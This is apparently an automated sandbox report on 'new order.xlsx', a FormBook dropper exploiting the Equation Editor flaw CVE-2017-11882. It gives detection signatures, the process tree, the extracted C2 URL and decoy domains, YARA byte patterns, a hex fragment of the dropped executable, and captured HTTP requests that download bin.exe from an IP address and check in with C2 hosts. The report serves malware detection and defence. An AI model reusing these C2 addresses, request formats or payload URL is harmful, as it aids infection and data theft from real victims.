Windows Analysis Report new order.xlsx

Overview

General Information

Sample Name: new order.xlsx
Analysis ID: 452636
MD5: d59accd992813d35bb00a4b3f84c4ffe
SHA1: 851d437a71d1a156e0adb9f553611865b8c90d94
SHA256: 002e54405b1ce6dd9710be53d71e832fcffc92fb63fc8ef3a37d14e0867c4c10
Tags: VelvetSweatshop, xlsx

Detection

Family: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2752 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2368 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2592 cmdline: 'C:\Users\Public\vbc.exe' MD5: 750919BD7E02E7821EFA1B1BD0ED4EDA)
      • vbc.exe (PID: 856 cmdline: C:\Users\Public\vbc.exe MD5: 750919BD7E02E7821EFA1B1BD0ED4EDA)
        • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wlanext.exe (PID: 1428 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
            • cmd.exe (PID: 2544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.conectaragora.com/n84e/"], "decoy": ["upscalebuyer.com", "qtict.net", "karlgillard.com", "fangsbags.com", "blackwhitebangtan.com", "lojaautomatica.com", "browbabelondon.com", "dupladocabelo.com", "tcheap3dwdshop.com", "htnmg.com", "globaltradeview.com", "instrumentwinebreathe.net", "futurejobstech.com", "notemanches.com", "myconventionalcooking.xyz", "doniang.com", "ouruiwh.com", "tecnologiatimes.com", "yxbmfc.com", "mae-baby.com", "alsiha2020.com", "zenqueue.com", "myomlineservicing.com", "justin-appel.com", "protectallfarms.com", "fairwaysxm.com", "msec-santander.com", "previem.com", "legifo.com", "reitzforrep.com", "oanicoin.com", "scorchonerecords.com", "hheiy35.com", "aurorabradfordoptometrists.com", "kailinsen.com", "ownerspreinspect.com", "instantfames.com", "wdi.technology", "compareionizers.com", "habbuhot.info", "thinking-diversity.com", "swagmansbreakfast.com", "thepegasusclub.com", "crazyhorseoutfitters.com", "flvrpodcast.com", "mz66a.com", "vineyardtrailrides.com", "khazana-bazaar.com", "m-corgroup.com", "kidsnbuds.com", "whatsprosender.com", "lundagers.com", "betterhealthdc.com", "mehtalawgroup.com", "contex33.xyz", "fastloanflorida.net", "lautaigia.net", "792argonne.com", "xtravigant.com", "anbotechsolution.com", "minipockethouse.com", "ehubo3y.com", "greaterdenver.online", "batracomputer.com"]}

Yara Overview

Memory Dumps

Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 7.2.vbc.exe.400000.1.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x158c9:$sqlite3step: 68 34 1C 7B E1
  • 0x159dc:$sqlite3step: 68 34 1C 7B E1
  • 0x158f8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
  • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C

Source: 7.2.vbc.exe.400000.1.raw.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 103.155.80.130, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2368, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2592
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2592

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (the extracted C2 list and decoy domains are the ones given under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe; ReversingLabs: Detection: 32%
Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 32%
Multi AV Scanner detection for submitted file
Source: new order.xlsx; Virustotal: Detection: 30%
Source: new order.xlsx; ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match; File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe; Joe Sandbox ML: detected
Source: 7.2.vbc.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb; source: vbc.exe, wlanext.exe
Source: Binary string: wlanext.pdb; source: vbc.exe, 00000007.00000002.2246150655.00000000002A9000.00000004.00000020.sdmp
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 4x nop then pop edi
Source: global traffic; DNS query: name: www.thinking-diversity.com
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 103.155.80.130:80
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 103.155.80.130:80
Source: excel.exe; Memory has grown: Private usage: 4MB, later: 74MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2019696 ET TROJAN Possible MalDoc Payload Download Nov 11 2014 192.168.2.22:49167 -> 103.155.80.130:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.conectaragora.com/n84e/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 15:11:11 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20Last-Modified: Wed, 21 Jul 2021 22:09:30 GMTETag: "b0200-5c7a96cb69dfd"Accept-Ranges: bytesContent-Length: 721408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 97 f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 f6 0a 00 00 0a 00 00 00 00 00 00 8e 14 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 14 0b 00 4f 00 00 00 00 20 0b 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 f4 0a 00 00 20 00 00 00 f6 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 06 00 00 00 20 0b 00 00 08 00 00 00 f8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 14 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 58 ed 09 00 e4 26 01 00 03 00 00 00 e0 00 
00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 4f 11 7a bb aa 11 a4 54 af 14 0e 18 4e 1f b2 7e 2f e0 d0 10 2d e5 ba c2 08 75 c0 0a 4a 46 84 79 3f ae ef 45 5c d5 21 7f 3c f3 5f 91 c7 cb 7c 12 64 49 a9 c0 36 fc 99 f9 13 da 5c 84 10 3c a7 e6 19 6a fb 99 18 14 cc 0d 06 39 d0 cd d3 a7 8d 23 60 04 c4 87 55 cd 45 8f 04 06 13 83 62 f5 c3 bd 16 98 84 e2 ca c1 75 a7 90 70 a0 88 07 46 89 2b d3 ea 6c 71 cd f2 29 84 45 3d 6d 15 9e c0 c6 32 ce 18 e9 6d 8f 27 b8 38 2f 1a 64 6b b2 9f af c4 ac ea 15 f7 59 d1 4a 15 66 98 cc 6c 90 9b b9 68 d6 4e c0 76 b3 39 42 b6 2a da b8 a5 e2 99 f5 8e 8d 80 92 86 35 25 ee 6b 4f 55 41 4b a5 02 fb 0a 84 1d 8d 5e 0b ee e4 63 30 56 07 11 9a 30 85 44 e5 e8 1f f2 b5 d7 97 9a 83 b4 f4 99 e7 f5 1e 9b f2 f9 18 03 8a 1e e9 0e d1 53 e8 b8 c4 e6 1d 90 a1 f4 94 6b 31 ce 15 63 5f be 27 54 91 c9 7a 69 3a 8c ca fe 15 cd 42 ff 17 72 ff 2a 76 96 63 a1 4e 14 72 11 50 e4 fd 6f fe 17 f5 7b 8a ac c5 12 28 0b b2 f9 4d ee 3
Source: global traffic; HTTP traffic detected:
  GET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1
  Host: www.thinking-diversity.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1
  Host: www.globaltradeview.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View; IP Address: 199.59.242.153
Source: Joe Sandbox View; ASN Name: BODIS-NJUS
Source: Joe Sandbox View; ASN Name: TWIDC-AS-APTWIDCLimitedHK
Source: global traffic; HTTP traffic detected:
  GET /kung/bin.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 103.155.80.130
  Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 103.155.80.130 (this entry appears 50 times in the report)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\238B5502.emf
Source: global traffic; HTTP traffic detected:
  GET /kung/bin.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 103.155.80.130
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1
  Host: www.thinking-diversity.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic; HTTP traffic detected:
  GET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1
  Host: www.globaltradeview.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: www.thinking-diversity.com
Source: explorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
